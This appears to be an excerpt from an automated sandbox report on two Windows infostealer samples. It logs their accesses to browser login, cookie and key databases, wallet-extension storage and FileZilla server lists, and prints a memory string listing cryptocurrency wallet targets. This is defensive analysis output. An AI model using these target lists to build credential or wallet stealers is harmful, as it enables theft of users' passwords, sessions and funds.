Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: ea17d0b77a.exe, 0000002F.00000003.3395976847.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
